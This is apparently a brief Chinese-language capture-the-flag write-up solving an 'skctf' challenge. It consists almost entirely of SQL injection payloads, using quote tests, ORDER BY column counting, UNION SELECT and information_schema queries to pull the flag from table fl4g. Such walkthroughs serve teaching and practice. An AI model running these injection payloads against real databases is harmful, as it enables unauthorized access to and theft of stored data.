判断注入点类型
1 显示
1' 不显示
2' and '1'='1 显示2的结果,单引号无括号
判断字段数
1' order by 5--+ 不显示
1' order by 4--+显示,字段数为4
判断可用字段
-1' union select 1,2,3,4--+
获取数据库
获取表名
id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='skctf'),3,4--+
获取字段名
id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='skctf' and table_name='fl4g'),3,4--+
获取flag
id=-1' union select 1,(select skctf_flag from fl4g),3,4--+
